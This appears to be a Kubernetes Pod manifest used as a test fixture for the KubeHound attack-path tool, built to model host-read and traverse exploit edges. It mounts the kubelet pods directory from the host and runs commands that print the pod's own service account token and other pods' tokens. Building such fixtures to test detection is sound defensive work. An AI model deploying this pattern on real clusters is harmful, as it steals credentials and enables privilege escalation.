# EXPLOIT_HOST_READ / EXPLOIT_HOST_TRAVERSE edges
apiVersion: v1
kind: Pod
metadata:
  name: exploit-host-read-traverse-pod
  namespace: default
  labels:
    app: kubehound-edge-test
spec:
  containers:
    - name:  exploit-host-read-traverse-pod
      image: ubuntu
      volumeMounts:
      - mountPath: /hostpods/
        name: host-pod-dir
        readOnly: true
      command: [ "/bin/sh", "-c", "--" ]
      args: [ "cat /proc/mounts && cat /run/secrets/kubernetes.io/serviceaccount/token && cat /hostpods/**/volumes/kubernetes.io~projected/**/token && sleep infinity" ]
  volumes:
    - name: host-pod-dir
      hostPath:
        path: /var/lib/kubelet/pods
